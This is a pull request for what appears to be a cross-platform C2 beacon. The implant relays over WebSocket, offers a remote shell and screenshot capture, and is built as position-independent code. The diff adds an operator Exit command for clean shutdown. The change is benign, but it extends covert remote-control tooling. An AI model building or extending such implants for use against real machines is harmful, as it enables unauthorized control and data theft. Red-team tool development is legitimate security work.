### PR TITLE
feat(commands): add Exit command for graceful termination of the agent

### DIFF
--- a/docs/13-beacon.md
+++ b/docs/13-beacon.md
@@ -39,13 +39,15 @@ commandHandlers[CommandType::Command_ReadShell] = Handle_ReadShellCommand;
 commandHandlers[CommandType::Command_GetDisplays] = Handle_GetDisplaysCommand;
 commandHandlers[CommandType::Command_GetScreenshot] = Handle_GetScreenshotCommand;
 commandHandlers[CommandType::Command_ResetShell] = Handle_ResetShellCommand;
+commandHandlers[CommandType::Command_Exit] = Handle_ExitCommand;
 ```
 
 This array lives on the stack. That matters -- see section 2.
 
 **Step 2 -- Connect (lines 50-62):**
 
-The outer `while (1)` loop runs forever. Each iteration attempts a WebSocket
+The outer `while (!context.shouldExit)` loop runs until the operator sends an
+`Exit` command (otherwise it reconnects forever). Each iteration attempts a WebSocket
 connection to the relay:
 
 ```cpp
@@ -60,7 +62,9 @@ sessions, no leftover context from the previous attempt.
 
 **Step 3 -- Message loop (lines 65-113):**
 
-The inner `while (1)` reads binary WebSocket frames. Each frame is a command:
+The inner `while (!context.shouldExit)` reads binary WebSocket frames. Each frame
+is a command (it also exits when an `Exit` command sets the flag, after sending
+its acknowledgment):
 
 ```cpp
 auto readResult = wsClient.Read();

--- a/src/beacon/README.md
+++ b/src/beacon/README.md
@@ -28,7 +28,8 @@ Top-level application layer — connects to a relay server over WebSocket (TLS 1
 │  ├─ WriteShell          → ShellProcess::Write           │   │
 │  ├─ ReadShell           → ShellProcess::Read            │   │
 │  ├─ GetDisplays         → Screen::GetDevices            │   │
-│  └─ GetScreenshot       → Screen::Capture + JPEG encode │   │
+│  ├─ GetScreenshot       → Screen::Capture + JPEG encode │   │
+│  └─ Exit                → graceful ExitProcess          │   │
 │                                                             │
 └──────────────────────┬──────────────────────────────────────┘
                        │

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -16,6 +16,7 @@ enum CommandType : UINT8
     Command_GetDisplays = 6,
     Command_GetScreenshot = 7,
     Command_ResetShell = 8,
+    Command_Exit = 9,
     CommandTypeCount
 };
 
@@ -48,6 +49,9 @@ struct Context
 {
     Shell *shell = nullptr;
     ScreenCaptureContext *screenCaptureContext = nullptr;
+    // Set by Handle_ExitCommand; read by the main loop so it can send the ACK
+    // and then tear down. Lives on the stack (no data section) to stay PIC-safe.
+    BOOL shouldExit = false;
 
     ~Context()
     {
@@ -77,3 +81,4 @@ VOID Handle_WriteShellCommand(PCHAR command, USIZE commandLength, PPCHAR respons
 VOID Handle_ResetShellCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_GetDisplaysCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_GetScreenshotCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
+VOID Handle_ExitCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -388,6 +388,28 @@ VOID Handle_ResetShellCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] U
     *(PUINT32)*response = StatusCode::StatusSuccess;
 }
 
+// Exit - gracefully terminate the agent.
+//
+// Acknowledges the operator, then signals the main loop to tear down. The main
+// loop sends this ACK, exits both of its while(!context->shouldExit) loops, and
+// returns from start(); the WebSocket/shell/screen-capture are released by their
+// existing RAII destructors, and entry_point() finally calls the per-platform
+// ExitProcess(). No platform-specific code lives here: termination flows through
+// the existing ExitProcess() abstraction, so this command is uniform across all
+// targets (on UEFI, ExitProcess() maps to EfiResetShutdown and powers off).
+VOID Handle_ExitCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context)
+{
+    LOG_INFO("Handling ExitCommand: operator requested agent termination.");
+
+    // Acknowledge so the operator knows the exit was received and will be honored.
+    *responseLength = sizeof(UINT32);
+    *response = new CHAR[*responseLength];
+    *(PUINT32)*response = StatusCode::StatusSuccess;
+
+    // Signal the main loop to stop after sending this response.
+    context->shouldExit = true;
+}
+
 // Gets the list of display devices and their information
 VOID Handle_GetDisplaysCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE commandLength, PPCHAR response, PUSIZE responseLength, [[maybe_unused]] Context *context)
 {

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -391,9 +391,9 @@ VOID Handle_ResetShellCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] U
 // Exit - gracefully terminate the agent.
 //
 // Acknowledges the operator, then signals the main loop to tear down. The main
-// loop sends this ACK, exits both of its while(!context->shouldExit) loops, and
-// returns from start(); the WebSocket/shell/screen-capture are released by their
-// existing RAII destructors, and entry_point() finally calls the per-platform
+// loop sends this ACK, exits both of its while (!context.shouldExit) loops, and
+// returns from start(); WebSocketClient is released when it goes out of scope, and
+// Context::~Context frees any shell/screen-capture state before entry_point() calls
 // ExitProcess(). No platform-specific code lives here: termination flows through
 // the existing ExitProcess() abstraction, so this command is uniform across all
 // targets (on UEFI, ExitProcess() maps to EfiResetShutdown and powers off).

--- a/src/beacon/main.cc
+++ b/src/beacon/main.cc
@@ -25,6 +25,8 @@ static const CHAR *CommandTypeName(UINT8 type)
         return "GetScreenshot";
     case CommandType::Command_ResetShell:
         return "ResetShell";
+    case CommandType::Command_Exit:
+        return "Exit";
     default:
         return "Unknown";
     }
@@ -51,10 +53,11 @@ INT32 start()
     commandHandlers[CommandType::Command_GetDisplays] = Handle_GetDisplaysCommand;
     commandHandlers[CommandType::Command_GetScreenshot] = Handle_GetScreenshotCommand;
     commandHandlers[CommandType::Command_ResetShell] = Handle_ResetShellCommand;
+    commandHandlers[CommandType::Command_Exit] = Handle_ExitCommand;
 
     LOG_INFO("Agent starting, registered %d command handlers", (INT32)CommandType::CommandTypeCount);
 
-    while (1)
+    while (!context.shouldExit)
     {
         connectionAttempt++;
         LOG_INFO("Connection attempt #%u to %s", connectionAttempt, (PCCHAR)url);
@@ -69,7 +72,7 @@ INT32 start()
         LOG_INFO("WebSocket connection established (attempt #%u) to %s", connectionAttempt, (PCCHAR)url);
 
         UINT32 messageCount = 0;
-        while (1)
+        while (!context.shouldExit)
         {
             LOG_DEBUG("Waiting for next WebSocket message...");
             auto readResult = wsClient.Read();


### PR DESCRIPTION
## Summary

Added an exit command so that it is possible to terminate the agent. Command completely shuts down the agent. Closes #74 . 

## Type of Change

- [ ] Bug fix
- [x] New feature / command
- [ ] Refactoring (no functional changes)
- [ ] Documentation
- [ ] Build system / CI
- [ ] Other:

## Platforms Tested

- [x] `linux-x86_64-release`
- [x] `windows-x86_64-release`
- [x] `macos-aarch64-release`
- [x] Other:

## Binary Size Impact

<!-- Required: Report .text section size before and after your change for at least one preset -->
<!-- Use: llvm-size build/release/<platform>/<arch>/output.exe -->

```
Preset: Windows-x86-64-release
Before: exe 103,424 bytes, bin 101,449 bytes
After:  exe 103,936 bytes, bin 102,059 bytes
Diff:   + 512 B , + 610 B
```

## Checklist

- [x]  Build passes with no warnings for at least one preset
- [x]  Post-build PIC verification passes (no `.rdata`/`.rodata`/`.data`/`.bss` sections)
- [x] Code follows [naming conventions](CONTRIBUTING.md#naming-conventions) and [code style](CONTRIBUTING.md#code-style)
- [x] Doxygen documentation added for new public APIs
- [x] No STL, no exceptions, no RTTI
- [x] `Result<T, Error>` used for all fallible functions
- [x] Binary size diff reported above
- [x] README updated (if adding/modifying commands)

## Additional Notes

